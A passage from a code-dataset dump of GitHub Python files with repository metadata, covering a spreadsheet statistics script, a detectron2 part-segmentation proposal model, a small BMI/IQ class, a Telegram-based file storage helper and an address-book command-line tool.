else:\r\n plaintext = decrypt(message, key)\r\n mercury_display(plaintext)\r\n\r\n\r\ndef init():\r\n \"\"\"Initialises the module so it ready to processes messages\"\"\"\r\n mercury_server_send('$requestkey')\r\n","repo_name":"WilliamMayor/mercury","sub_path":"modules/Billy/shift/v2.0/comms.py","file_name":"comms.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16583837884","text":"import xlwings as xw\r\n\r\nTEXT_WIDTH = 40 #How many characters in Each Line\r\nDIGITS = 3 # how many digits to be shown while calculating averages and %age\r\n\r\n\r\nsheet = xw.Book('test.xlsx').sheets[0] #Name of the excel sheet having the data\r\n\r\narr = sheet.range('A2:A99').value # The range of the data column\r\n\r\npure = []\r\nSum = 0\r\ncount = 0\r\n\r\n\r\ndef is_number(s):\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return 
False\r\n\r\n\r\n \r\nfor i in arr:\r\n if i != None:\r\n if is_number(i):\r\n Sum+=float(i)\r\n count+=1\r\n pure.append(i)\r\npure.sort()\r\nperc = {}\r\nfor i in pure:\r\n\r\n \r\n if i in perc.keys():\r\n perc[i]+=1\r\n else:\r\n perc[i] = 1\r\ndata = []\r\nkeys = list(perc.keys())\r\n\r\nMax = keys[0]\r\nMin = keys[0]\r\nprint(\"DETAILED BREAKDOWN\")\r\nprint()\r\n\r\nfor i in perc:\r\n if perc[i]>perc[Max]:\r\n Max = i\r\n if perc[i]<perc[Min]:\r\n Min = i\r\n data.append((str(i),str(perc[i]),str((perc[i]/count)*100)[:1+DIGITS]))\r\n \r\n\r\n\r\n \r\n\r\ndata1 = [['VALUE'],['No. of entries'],['% of total entries']]\r\ncolumns = []\r\n\r\nfor i in data1:\r\n columns.append(i[0])\r\nwidth = [0,0,0]\r\ndata.insert(0,tuple(columns))\r\n\r\nfor row in data:\r\n t = 0\r\n for column in row:\r\n if width[t] < len(str(column)):\r\n width[t] = len(str(column))\r\n t+=1\r\n \r\nfor row in data:\r\n t=0\r\n \r\n for column in row:\r\n x = width[t]\r\n \r\n for i in str(column):\r\n print (i,end = '')\r\n x-=1\r\n \r\n while x != 0:\r\n print(' ',end = '')\r\n x-=1\r\n t+=1\r\n print(' | ',end ='') \r\n print()\r\nprint()\r\nprint('Average :',str((Sum/count))[:2+DIGITS])\r\nprint()\r\n\r\nmid = len(pure) // 2\r\nres = (pure[mid] + pure[~mid]) / 2\r\nprint(\"Median : \" + str(res))\r\nprint()\r\n\r\nprint('Maximum %age at ',Max,' With %age',str((perc[Max]/count)*100)[:1+DIGITS])\r\nprint('Minimum %age at ',Min,' With %age',str((perc[Min]/count)*100)[:1+DIGITS])\r\n\r\n","repo_name":"Amogh-Walia/Data-Analyser","sub_path":"Data Breakdown.py","file_name":"Data Breakdown.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72088716322","text":"import os\nimport logging\nimport torch\nimport numpy as np\nimport detectron2.utils.comm as comm\nimport wandb\n\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom typing import Tuple, Union, Any, List\nfrom detectron2.config import configurable\nfrom detectron2.data import MetadataCatalog\nfrom detectron2.modeling import META_ARCH_REGISTRY, build_backbone, build_sem_seg_head\nfrom detectron2.modeling.backbone import Backbone\nfrom detectron2.modeling.postprocessing import sem_seg_postprocess\nfrom detectron2.structures import ImageList, Instances\nfrom detectron2.utils.memory import retry_if_cuda_oom\nfrom detectron2.data.detection_utils import read_image\nfrom detectron2.utils.visualizer import ColorMode\nfrom .modeling.criterion import SetCriterion\nfrom .modeling.matcher import HungarianMatcher\nfrom .utils.utils import Partvisualizer, get_iou_all_cocoapi\n\n\n@META_ARCH_REGISTRY.register()\nclass ProposalModel(nn.Module):\n \"\"\"\n Proposal model trained with pseudo-labels based on Mask2Former.\n \"\"\"\n\n @configurable\n def __init__(\n self,\n *,\n backbone: Backbone,\n sem_seg_head: nn.Module,\n criterion: nn.Module,\n num_queries: int,\n num_classes: int,\n size_divisibility: int,\n pixel_mean: Tuple[float],\n pixel_std: Tuple[float],\n test_topk_per_image: int,\n dataset_name: str=\"\",\n # wandb\n use_wandb: bool=True,\n wandb_vis_period_train: int=200,\n wandb_vis_period_test: int=20,\n wandb_vis_topk: int=200,\n use_unique_per_pixel_label: bool=False,\n minimum_pseudo_mask_score: float=0.0,\n minimum_pseudo_mask_ratio: float=0.0,\n apply_masking_with_object_mask: bool=True,\n ):\n super().__init__()\n self.backbone = backbone\n self.sem_seg_head = sem_seg_head\n self.criterion = criterion\n self.num_queries = num_queries\n 
self.num_classes = num_classes\n if size_divisibility < 0:\n # use backbone size_divisibility if not set\n size_divisibility = self.backbone.size_divisibility\n self.size_divisibility = size_divisibility\n self.register_buffer(\"pixel_mean\", torch.Tensor(pixel_mean).view(-1, 1, 1), False)\n self.register_buffer(\"pixel_std\", torch.Tensor(pixel_std).view(-1, 1, 1), False)\n self.test_topk_per_image = test_topk_per_image\n self.cpu_device = torch.device(\"cpu\")\n self.metadata = MetadataCatalog.get(dataset_name)\n self.logger = logging.getLogger(\"part_distillation\")\n\n # wandb\n self.use_wandb = use_wandb\n self.wandb_vis_period_train = wandb_vis_period_train\n self.wandb_vis_period_test = wandb_vis_period_test\n self.wandb_vis_topk = wandb_vis_topk\n self.num_train_iterations = 0\n self.num_test_iterations = 0\n\n self.use_unique_per_pixel_label = use_unique_per_pixel_label\n self.minimum_pseudo_mask_score = minimum_pseudo_mask_score\n self.minimum_pseudo_mask_ratio = minimum_pseudo_mask_ratio\n self.apply_masking_with_object_mask = apply_masking_with_object_mask\n\n\n def set_postprocess_type(self, postprocess_type):\n if postprocess_type == \"semseg\":\n self.use_unique_per_pixel_label = True\n elif postprocess_type == \"prop\":\n self.use_unique_per_pixel_label = False\n elif postprocess_type == \"prop-filtered\":\n self.use_unique_per_pixel_label = False\n self.minimum_pseudo_mask_score = 0.3\n\n def reset_postprocess_type(self, flag, score_thres):\n self.use_unique_per_pixel_label = flag\n self.minimum_pseudo_mask_score = score_thres\n\n\n @classmethod\n def from_config(cls, cfg):\n backbone = build_backbone(cfg)\n sem_seg_head = build_sem_seg_head(cfg, backbone.output_shape())\n\n # Loss parameters:\n deep_supervision = cfg.MODEL.MASK_FORMER.DEEP_SUPERVISION\n no_object_weight = cfg.MODEL.MASK_FORMER.NO_OBJECT_WEIGHT\n\n # loss weights\n class_weight = cfg.MODEL.MASK_FORMER.CLASS_WEIGHT\n dice_weight = cfg.MODEL.MASK_FORMER.DICE_WEIGHT\n mask_weight = cfg.MODEL.MASK_FORMER.MASK_WEIGHT\n\n # building criterion\n matcher = HungarianMatcher(\n cost_class=class_weight,\n cost_mask=mask_weight,\n cost_dice=dice_weight,\n num_points=cfg.MODEL.MASK_FORMER.TRAIN_NUM_POINTS,\n )\n\n weight_dict = {\"loss_ce\": class_weight, \"loss_mask\": mask_weight, \"loss_dice\": dice_weight}\n\n if deep_supervision:\n dec_layers = cfg.MODEL.MASK_FORMER.DEC_LAYERS\n aux_weight_dict = {}\n for i in range(dec_layers - 1):\n aux_weight_dict.update({k + f\"_{i}\": v for k, v in weight_dict.items()})\n weight_dict.update(aux_weight_dict)\n\n losses = [\"labels\", \"masks\"]\n\n criterion = SetCriterion(\n sem_seg_head.num_classes,\n matcher=matcher,\n weight_dict=weight_dict,\n eos_coef=no_object_weight,\n losses=losses,\n num_points=cfg.MODEL.MASK_FORMER.TRAIN_NUM_POINTS,\n oversample_ratio=cfg.MODEL.MASK_FORMER.OVERSAMPLE_RATIO,\n importance_sample_ratio=cfg.MODEL.MASK_FORMER.IMPORTANCE_SAMPLE_RATIO,\n )\n\n return {\n \"backbone\": backbone,\n \"sem_seg_head\": sem_seg_head,\n \"criterion\": criterion,\n \"num_queries\": cfg.MODEL.MASK_FORMER.NUM_OBJECT_QUERIES,\n \"size_divisibility\": cfg.MODEL.MASK_FORMER.SIZE_DIVISIBILITY,\n \"pixel_mean\": cfg.MODEL.PIXEL_MEAN,\n \"pixel_std\": cfg.MODEL.PIXEL_STD,\n \"num_classes\": cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,\n # wandb\n \"wandb_vis_period_train\": cfg.WANDB.VIS_PERIOD_TRAIN,\n \"wandb_vis_period_test\": cfg.WANDB.VIS_PERIOD_TEST,\n \"wandb_vis_topk\": cfg.WANDB.VIS_TOPK,\n \"use_wandb\": not cfg.WANDB.DISABLE_WANDB,\n \"dataset_name\": 
cfg.DATASETS.TRAIN[0],\n # inference\n \"test_topk_per_image\": cfg.TEST.DETECTIONS_PER_IMAGE,\n \"use_unique_per_pixel_label\": cfg.PROPOSAL_LEARNING.USE_PER_PIXEL_LABEL,\n \"apply_masking_with_object_mask\": cfg.PROPOSAL_LEARNING.APPLY_MASKING_WITH_OBJECT_MASK,\n \"minimum_pseudo_mask_ratio\": cfg.PROPOSAL_LEARNING.MIN_AREA_RATIO,\n \"minimum_pseudo_mask_score\": cfg.PROPOSAL_LEARNING.MIN_SCORE,\n }\n\n\n @property\n def device(self):\n return self.pixel_mean.device\n\n def forward(self, batched_inputs):\n # assert \"instances\" in batched_inputs[0], \"gt should always be present. \"\n images = [x[\"image\"].to(self.device) for x in batched_inputs]\n images = [(x - self.pixel_mean) / self.pixel_std for x in images]\n images = ImageList.from_tensors(images, self.size_divisibility)\n\n features = self.backbone(images.tensor)\n targets = self.prepare_targets(batched_inputs, images)\n outputs = self.sem_seg_head(features)\n\n if self.training:\n # bipartite matching-based loss\n losses = self.criterion(outputs, targets)\n\n for k in list(losses.keys()):\n if k in self.criterion.weight_dict:\n losses[k] *= self.criterion.weight_dict[k]\n else:\n # remove this loss if not specified in `weight_dict`\n losses.pop(k)\n\n if self.use_wandb and comm.is_main_process():\n if self.num_train_iterations % self.wandb_vis_period_train == 0:\n processed_results_vis = self.inference(batched_inputs, targets, images, outputs, vis=True)\n self.wandb_visualize(batched_inputs, images, processed_results_vis, is_training=True)\n del processed_results_vis\n self.num_train_iterations += 1\n return losses\n else:\n processed_results = self.inference(batched_inputs, targets, images, outputs, vis=False)\n if self.use_wandb and comm.is_main_process():\n if self.num_test_iterations % self.wandb_vis_period_test == 0:\n processed_results_vis = self.inference(batched_inputs, targets, images, outputs, vis=True)\n self.wandb_visualize(batched_inputs, images, processed_results_vis, is_training=False)\n del processed_results_vis\n self.num_test_iterations += 1\n\n del batched_inputs, features, outputs, targets\n torch.cuda.empty_cache()\n\n return processed_results\n\n\n def inference(self, batched_inputs, targets, images, outputs, vis=False):\n mask_cls_results = outputs[\"pred_logits\"]\n mask_pred_results = outputs[\"pred_masks\"]\n\n # upsample masks\n mask_pred_results = F.interpolate(\n mask_pred_results,\n size=(images.tensor.shape[-2], images.tensor.shape[-1]),\n mode=\"bilinear\",\n align_corners=False,\n )\n\n processed_results = []\n for batch_idx, (mask_cls_result, mask_pred_result, target, input_per_image, image_size) in enumerate(zip(\n mask_cls_results, mask_pred_results, targets, batched_inputs, images.image_sizes\n )):\n # NOTE: Unlike standard pipeline, we provide gt label as input for inference.\n # This reshapes the labels to input size already, so we want to reshape\n # both gts and predictions to the original image size.\n height = input_per_image.get(\"height\", image_size[0])\n width = input_per_image.get(\"width\", image_size[1])\n\n # print(\"During inference: \", height, width, image_size, target[\"masks\"].shape, mask_pred_result.shape, flush=True)\n mask_pred_result = retry_if_cuda_oom(sem_seg_postprocess)(mask_pred_result, image_size, height, width)\n target_masks = retry_if_cuda_oom(sem_seg_postprocess)(target[\"masks\"].float(), image_size, height, width).bool()\n target_object_masks = retry_if_cuda_oom(sem_seg_postprocess)(target[\"object_masks\"].float(), image_size, height, width).bool()\n 
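# detectron2's retry_if_cuda_oom re-runs the wrapped call after clearing the CUDA cache\n            # and, if it still runs out of memory, retries with the tensor arguments moved to CPU.\n            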
mask_cls_result = mask_cls_result.to(mask_pred_result)\n\n processed_results.append({})\n instance_r = self.instance_inference(mask_cls_result, mask_pred_result, target_masks, target_object_masks, target[\"labels\"], vis=vis)\n target_inst = Instances(target_masks.shape[-2:])\n target_inst.gt_masks = target_masks\n target_inst.gt_classes = target[\"labels\"]\n\n # For visualization\n target_inst.pred_masks = target_masks\n target_inst.pred_classes = target[\"labels\"]\n\n processed_results[-1][\"proposals\"] = instance_r\n processed_results[-1][\"gt_masks\"] = target_inst\n\n\n return processed_results\n\n\n\n\n def _unique_assignment(self, masks_per_image, scores_per_image):\n obj_map_per_image = masks_per_image.topk(1, dim=0)[0] > 0.\n if self.use_unique_per_pixel_label:\n binmask_per_image = masks_per_image > 0\n predmask_per_image = scores_per_image[:, None, None] * masks_per_image.sigmoid()\n\n scoremap_per_image = predmask_per_image.topk(1, dim=0)[1]\n query_indexs_list = scoremap_per_image.unique()\n newmasks_per_image = masks_per_image.new_zeros(len(query_indexs_list), *scoremap_per_image.shape[1:])\n for i, cid in enumerate(query_indexs_list):\n newmasks_per_image[i] = (scoremap_per_image == cid) & obj_map_per_image\n scores_per_image = scores_per_image[query_indexs_list]\n loc_valid_idxs = newmasks_per_image.flatten(1).sum(dim=1) / obj_map_per_image.flatten(1).sum(dim=1) > self.minimum_pseudo_mask_ratio\n if loc_valid_idxs.any():\n newmasks_per_image = newmasks_per_image[loc_valid_idxs]\n scores_per_image = scores_per_image[loc_valid_idxs]\n\n loc_valid_idxs = scores_per_image > self.minimum_pseudo_mask_score\n if loc_valid_idxs.any():\n newmasks_per_image = newmasks_per_image[loc_valid_idxs]\n scores_per_image = scores_per_image[loc_valid_idxs]\n\n return newmasks_per_image.bool(), scores_per_image\n\n else:\n loc_valid_idxs = (masks_per_image > 0).flatten(1).sum(dim=1) / obj_map_per_image.flatten(1).sum(dim=1) > self.minimum_pseudo_mask_ratio\n if loc_valid_idxs.any():\n masks_per_image = masks_per_image[loc_valid_idxs]\n scores_per_image = scores_per_image[loc_valid_idxs]\n\n loc_valid_idxs = scores_per_image > self.minimum_pseudo_mask_score\n if loc_valid_idxs.any():\n masks_per_image = masks_per_image[loc_valid_idxs]\n scores_per_image = scores_per_image[loc_valid_idxs]\n\n return (masks_per_image > 0), scores_per_image\n\n\n\n def prepare_targets(self, inputs, images):\n if self.training:\n return self._prepare_pseudo_targets(inputs, images)\n else:\n return self._prepare_gt_targets(inputs, images)\n\n\n def _prepare_pseudo_targets(self, inputs, images):\n \"\"\"\n This is used when training with ImageNet.\n \"\"\"\n pseudo_targets = [x[\"instances\"].to(self.device) for x in inputs]\n h_pad, w_pad = images.tensor.shape[-2:]\n new_targets = []\n for input_per_image, pseudo_targets_per_image in zip(inputs, pseudo_targets):\n if pseudo_targets_per_image.has(\"gt_masks\"):\n gt_pseudo_masks = pseudo_targets_per_image.gt_masks.tensor\n padded_pseudo_masks = torch.zeros((gt_pseudo_masks.shape[0], h_pad, w_pad),\n dtype=gt_pseudo_masks.dtype, device=gt_pseudo_masks.device)\n padded_pseudo_masks[:, : gt_pseudo_masks.shape[1], : gt_pseudo_masks.shape[2]] = gt_pseudo_masks\n n = padded_pseudo_masks.shape[0]\n\n # During training with ImageNet, we assume each image has only one object.\n object_masks = padded_pseudo_masks.sum(0, keepdim=True)\n new_targets.append({\"labels\": torch.zeros(n).long().to(self.device), # All-zeros\n \"masks\": padded_pseudo_masks,\n \"object_masks\": 
object_masks,\n # \"gt_object_class\": input_per_image[\"gt_object_class\"],\n })\n else:\n raise ValueError(\"pseudo label without masks.\")\n\n return new_targets\n\n\n\n def _prepare_gt_targets(self, inputs, images):\n targets = [x[\"part_instances\"].to(self.device) for x in inputs]\n object_targets = [x[\"instances\"].to(self.device) for x in inputs]\n\n h_pad, w_pad = images.tensor.shape[-2:]\n new_targets = []\n for object_targets_per_image, targets_per_image in zip(object_targets, targets):\n gt_mask = targets_per_image.gt_masks.tensor\n padded_masks = torch.zeros((gt_mask.shape[0], h_pad, w_pad),\n dtype=gt_mask.dtype, device=gt_mask.device)\n padded_masks[:, : gt_mask.shape[1], : gt_mask.shape[2]] = gt_mask\n n = padded_masks.shape[0]\n\n gt_obj_mask = object_targets_per_image.gt_masks.tensor\n padded_obj_masks = torch.zeros((gt_obj_mask.shape[0], h_pad, w_pad),\n dtype=gt_obj_mask.dtype, device=gt_obj_mask.device)\n padded_obj_masks[:, : gt_obj_mask.shape[1], : gt_obj_mask.shape[2]] = gt_obj_mask\n\n labels = targets_per_image.gt_classes.to(self.device)\n new_targets.append({\"labels\": labels,\n \"masks\": padded_masks,\n # \"gt_object_class\": object_targets_per_image.gt_classes.to(self.device),\n \"object_masks\": padded_obj_masks,\n })\n\n return new_targets\n\n\n\n def masking_with_object_mask(self, masks_per_image, target_masks):\n if self.apply_masking_with_object_mask:\n object_target_mask = target_masks.sum(dim=0, keepdim=True).bool()\n\n return masks_per_image * object_target_mask\n else:\n return masks_per_image\n\n\n def instance_inference(self, mask_cls, mask_pred, target_masks, target_object_masks, target_labels, vis=False):\n # mask_pred is already processed to have the same shape as original input\n image_size = mask_pred.shape[-2:]\n\n # [Q, K=1]\n topk = self.wandb_vis_topk if vis and not self.use_unique_per_pixel_label else self.test_topk_per_image\n scores = mask_cls.softmax(-1)[:, :-1]\n\n scores = scores.topk(1, dim=1)[0].flatten() # Use the top confidence score. 
(proposal eval only.)\n scores_per_image, topk_indices = scores.topk(topk, sorted=False)\n mask_pred = mask_pred[topk_indices]\n\n mask_pred = self.masking_with_object_mask(mask_pred, target_object_masks)\n mask_pred_bool, scores_per_image = self._unique_assignment(mask_pred, scores_per_image)\n\n mask_pred_bool, scores_per_image, gt_part_labels = \\\n self.match_gt_labels(mask_pred_bool, scores_per_image, target_masks, target_labels)\n\n if mask_pred_bool.shape[0] == 0:\n # doesn't contribute to the evaluation.\n mask_pred_bool = mask_pred.new_zeros(1, *mask_pred.shape[1:]).bool()\n scores_per_image = scores_per_image.new_zeros(1)\n gt_part_labels = gt_part_labels.new_zeros(1)\n\n result = Instances(image_size)\n # mask (before sigmoid)\n result.pred_masks = mask_pred_bool\n pred_masks_float = result.pred_masks.float()\n result.pred_classes = gt_part_labels # not used (vis only)\n result.scores = scores_per_image\n\n return result\n\n def register_metadata(self, dataset_name):\n self.logger.info(\"{} is registered for evaluation.\".format(dataset_name))\n self.metadata = MetadataCatalog.get(dataset_name)\n\n\n def match_gt_labels(self, masks_per_image, scores_per_image, target_masks, target_labels):\n pairwise_mask_ious = get_iou_all_cocoapi(masks_per_image, target_masks)\n\n top1_ious, top1_idx = pairwise_mask_ious.topk(1, dim=1)\n\n top1_idx = top1_idx.flatten()\n fg_idxs = (top1_ious > 0.001).flatten()\n\n gt_part_labels = target_labels[top1_idx[fg_idxs]]\n masks_per_image = masks_per_image[fg_idxs]\n scores_per_image = scores_per_image[fg_idxs]\n\n return masks_per_image, scores_per_image, gt_part_labels\n\n\n\n def match_semseg_gt_labels(self, masks_per_image, scores_per_image, prop_feats_per_image, target_masks, target_labels):\n pairwise_mask_ious = get_iou_all_cocoapi(masks_per_image, target_masks)\n\n top1_ious, top1_idx = pairwise_mask_ious.topk(1, dim=1)\n\n top1_idx = top1_idx.flatten()\n fg_idxs = (top1_ious > 0.001).flatten()\n\n gt_part_labels = target_labels[top1_idx[fg_idxs]]\n masks_per_image = masks_per_image[fg_idxs]\n scores_per_image = scores_per_image[fg_idxs]\n prop_feats_per_image = prop_feats_per_image[fg_idxs]\n\n return masks_per_image, scores_per_image, prop_feats_per_image, gt_part_labels\n\n\n\n def wandb_visualize(self, inputs, images, processed_results, is_training, opacity=0.8):\n # NOTE: Hack to use input as visualization image.\n images_raw = [x[\"image\"].float().to(self.cpu_device) for x in inputs]\n images_vis = [retry_if_cuda_oom(sem_seg_postprocess)(img, img_sz, x.get(\"height\", img_sz[0]), x.get(\"width\", img_sz[1]))\n for img, img_sz, x in zip(images_raw, images.image_sizes, inputs)]\n images_vis = [img.to(self.cpu_device) for img in images_vis]\n result_vis = [r[\"proposals\"].to(self.cpu_device) for r in processed_results]\n target_vis = [r[\"gt_masks\"].to(self.cpu_device) for r in processed_results]\n image, instances, targets = images_vis[0], result_vis[0], target_vis[0]\n image = image.permute(1, 2, 0).to(torch.uint8)\n white = np.ones(image.shape) * 255\n image = image * opacity + white * (1-opacity)\n\n metadata = self.metadata if not is_training else None\n visualizer = Partvisualizer(image, metadata, instance_mode=ColorMode.IMAGE)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\n\n image_pd = wandb.Image(vis_output.get_image())\n wandb.log({\"predictions\": image_pd})\n\n visualizer = Partvisualizer(image, metadata, instance_mode=ColorMode.IMAGE)\n vis_output = 
visualizer.draw_instance_predictions(predictions=targets)\n\n        image_gt = wandb.Image(vis_output.get_image())\n        wandb.log({\"ground_truths\": image_gt})\n","repo_name":"facebookresearch/PartDistillation","sub_path":"part_distillation/proposal_model.py","file_name":"proposal_model.py","file_ext":"py","file_size_in_byte":20936,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"54"}
+{"seq_id":"12088455267","text":"import math\n\nclass Ember:\n    def __init__(self, Eletkor = 0, magassag = 0, Tudasszint = 0, Nem = \"\", Csaladnev = \"\", Keresztnev = \"\", testsuly = \"\"):\n        self.Eletkor = Eletkor\n        self.magassag = magassag\n        self.Tudasszint = Tudasszint\n        self.Nem = Nem\n        self.Csaladnev = Csaladnev\n        self.Keresztnev = Keresztnev\n        self.testsuly = testsuly\n\n    def BMI(self):\n        BMI = round(self.testsuly/((self.magassag/100)*(self.magassag/100)))\n        return BMI\n\n    def IQ(self):\n        IQ = round((self.Eletkor/self.Tudasszint)*100)\n        return IQ\n\n    def Kiir(self):\n        return print(\"Your gender:\", self.Nem, \", your name:\", self.Csaladnev + \" \" + self.Keresztnev,\n                     \", your age:\", self.Eletkor, \"years, your height: \", self.magassag, \", your weight: \", self.testsuly,\n                     \"kg, your BMI:\", self.BMI(),\n                     \", your IQ:\", self.IQ())\n\n","repo_name":"FoszlerDanielA/doga001","sub_path":"ember_o.py","file_name":"ember_o.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"25416173252","text":"from functools import reduce\nimport json\nimport pyrogram\nfrom utils.files import files\nimport os\nimport time\n\nclass telegram:\n\n    creds = {}\n    app = None\n\n    def __init__(self) -> None:\n        self.creds = telegram.getCreds(self)\n        self.app = pyrogram.Client(\"my_account\", self.creds[\"id\"], self.creds[\"hash\"])\n\n    \n    def getCreds(self) -> dict:\n        if(not os.path.exists(\"./data/creds.json\")):\n            print(\"You need to get your own Telegram API ID and hash\")\n            print('''\n            \n            1. Go to https://my.telegram.org/auth and log in to your Telegram account with the phone number of the developer account to use.\n            2. Click on API Development tools.\n            3. A Create new application window will appear. Fill in your application details. There is no need to enter any URL, and only the first two fields (App title and Short name) can currently be changed later.\n            4. Click on Create application at the end. Remember that your API hash is secret and Telegram won’t let you revoke it. Don’t post it anywhere!\n\n            ''')\n            id = input(\"Enter your API id: \")\n            hash = input(\"Enter your API hash: \")\n            f = open(\"./data/creds.json\", \"w\")\n            x = {\n                \"id\": id,\n                \"hash\" : hash\n            }\n            f.write(files.toJSON(x))\n            f.close()\n            app = pyrogram.Client(\"my_account\", id, hash)\n            with app:\n                app.send_message(\"me\",\"Welcome to Tdrive!! 
You have been successfully authenticated and now you can use Tdrive to store all your files for free.\")\n\n        \n        f = open(\"./data/creds.json\", \"r\")\n        d = json.loads(f.read())\n        return d\n\n    def sendDocument(self,path) -> str:\n        app = self.app\n        with app:\n            app.send_document(\"me\",path,progress=telegram.progress)\n            for x in app.get_chat_history(\"me\",1):\n                return str(x.document.file_id)\n\n    def downloadDocument(self,fileid,filename):\n        app = self.app\n        with app:\n            app.download_media(fileid,\"./downloads/\"+ filename,progress=telegram.progress)\n\n    \n    def progress(current, total):\n        if(total == 0): return\n        print(\"\\r\" + f\"Progress: {current * 100 / total:.1f}%\",end=\"\")","repo_name":"RealNethical/Tdrive","sub_path":"utils/telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"}
+{"seq_id":"72574710881","text":"from bl_lower import *\n\n\"\"\"\nHelpers that print the current time and the message type\n\"\"\"\n\n\ndef ti_and_inf():\n    text = '\\033[32m Info\\033[0m'\n    return f'\\033[33m{t_now()}\\033[0m ' + text + ': '\n\n\ndef ti_and_war():\n    text = '\\033[31m Error\\033[0m'\n    return f'\\033[33m{t_now()}\\033[0m ' + text + ': '\n\n\ndef ti_and_you():\n    text = '\\033[34m Your\\033[0m'\n    return f'\\033[33m{t_now()}\\033[0m ' + text + ': '\n\n\n\"\"\"\nMessage output functions\n\"\"\"\n\n\ndef welcome():\n    print(f'{ti_and_inf()} The program is up and ready to work!')\n\n\ndef reminder():\n    print(f'               Choose the next action (help - show the commands):')\n\n\ndef goodbye():\n    print(f'{ti_and_inf()} The program has finished!')\n\n\n\"\"\"\nCommand help output\n\"\"\"\n\n\ndef book_com_info():\n    print(f'{ti_and_inf()} open - Open an address book\\n'\n          f'               list - Show the available books\\n' \n          f'               now - Create an address book\\n'\n          f'               rem - Delete an address book\\n'\n          f'               book - Open the folder with converted files\\n' \n          f'               stop - Quit')\n\n\ndef contact_com_info():\n    print(f'{ti_and_inf()} add - Add a contact\\n'\n          f'               del - Delete a contact\\n'\n          f'               read - Show the whole contact list\\n'\n          f'               search - Search for a contact in the book\\n'\n          f'               edit - Edit a contact in the book\\n'\n          f'               change - Switch to another address book\\n'\n          f'               convert - Convert the address book\\n'\n          f'               book - Open the folder with converted files\\n' \n          f'               stop - Quit')\n\n\n\"\"\"\nWorking with address books.\n\"\"\"\n\n\ndef book():\n    print(f'{ti_and_inf()} You need to choose an address book:')\n    book_com_info()\n    while True:\n        com = input(f'{blu.ti_and_you()} > ')\n        result_b = input_com_book(com)\n        if result_b == 'stop':\n            return False\n        elif not result_b:\n            continue\n        else:\n            return result_b\n\n\n# check the command and execute it\ndef input_com_book(var):\n    if var == 'stop':\n        return var\n\n    elif var == 'open':\n        if list_books():\n            print(f'{ti_and_inf()} Enter the address book name:\\n'\n                  f'               break - Cancel opening the address book')\n            name = input(f'{ti_and_you()} > ')\n            if name == 'stop':\n                return name\n            elif name == 'break':\n                print(f'{ti_and_inf()} You cancelled opening the address book!')\n                reminder()\n                return\n            elif name == '':\n                print(f'{ti_and_inf()} The address book name cannot be empty')\n                reminder()\n                return\n            buff = open_books(name)\n            if buff == 'stop':\n                return buff\n            elif buff:\n                return name\n        else:\n            reminder()\n\n    elif var == 'now':\n        print(f'{ti_and_inf()} Enter the address book name:\\n'\n              f'               break - cancel creating the address 
book')\n        name = input(f'{ti_and_you()} > ')\n        if name == 'stop':\n            return name\n        elif name == 'break':\n            print(f'{ti_and_inf()} You cancelled creating the address book!')\n            reminder()\n            return\n        elif name == '':\n            print(f\"{ti_and_war()} You did not enter an address book name, try again!\")\n            reminder()\n            return\n        else:\n            create_book(name)\n\n    elif var == 'rem':\n        if list_books():\n            print(f'{ti_and_inf()} Enter the name of the address book to delete:\\n'\n                  f'               break - Cancel the deletion!')\n            name = input(f'{ti_and_you()} > ')\n            if name + '.data' in os.listdir(r'books'):\n                del_book(name)\n                reminder()\n            elif name == 'stop':\n                return name\n            elif name == 'break':\n                print(f'{ti_and_inf()} You cancelled deleting the address book!')\n                reminder()\n                return\n            elif name == '':\n                print(f\"{ti_and_war()} You did not enter an address book name, try again!\")\n                reminder()\n                return\n            else:\n                del_book(name)\n                reminder()\n        else:\n            reminder()\n\n    elif var == 'list':\n        list_books()\n        reminder()\n\n    elif var == 'help':\n        book_com_info()\n\n    elif var == 'book':\n        exists_file_convert()\n        os.system(r\"explorer.exe Convert Books\")\n        reminder()\n\n    else:\n        print(f'{ti_and_war()} No such command found')\n        reminder()\n\n\n\"\"\"\nWorking with contacts.\n\"\"\"\n\n\ndef contact(name_book):\n    print(f'{ti_and_inf()} Choose an action to work with the contact list:')\n    contact_com_info()\n    while True:\n        com = input(f'{ti_and_you()} > ')\n        result_c = input_com_contact(name_book, com)\n        if result_c == 'stop':\n            return False\n        elif result_c == 'rep':\n            return True\n        elif result_c == 'change':\n            return result_c\n\n\ndef input_com_contact(name_book, var):\n    if var == 'stop':\n        return var\n\n    elif var == 'add':\n        buff = add_contact(name_book)\n        if buff == 'stop':\n            return buff\n        elif buff == 'break':\n            print(f'{ti_and_inf()} You cancelled adding the contact')\n            blu.reminder()\n            return\n        blu.reminder()\n\n    elif var == 'del':\n        if not read_cont(name_book):\n            print(f'{ti_and_war()} The contact list is empty!')\n            reminder()\n            return\n        target = input_target()\n        if target == 'stop':\n            return target\n        elif target == 'break':\n            print(f'{ti_and_inf()} You cancelled deleting the contact')\n            blu.reminder()\n            return\n        if check_target_in_lst(name_book, target):\n            print(f'{ti_and_war()} No such contacts found.')\n            reminder()\n            return\n        optional = option_del(name_book, target)\n        if optional == 'stop':\n            return optional\n        elif optional == 'break':\n            print(f'{ti_and_inf()} You cancelled deleting the contact')\n            blu.reminder()\n            return\n\n    elif var == 'read':\n        lst = read_cont(name_book)\n        if lst:\n            print(f'{ti_and_inf()} All contacts in this address book:')\n            for i in range(len(lst)):\n                print(f'               {i + 1}) {\" \".join(lst[i])}', end='')\n        else:\n            print(f'{ti_and_war()} The contact list is empty!')\n        reminder()\n\n    elif var == 'edit':\n        if not read_cont(name_book):\n            print(f'{ti_and_war()} The contact list is empty!')\n            reminder()\n            return\n        target = input_target()\n        if target == 'stop':\n            return target\n        elif target == 'break':\n            print(f'{ti_and_inf()} You cancelled editing the contact')\n            blu.reminder()\n            return\n        if check_target_in_lst(name_book, 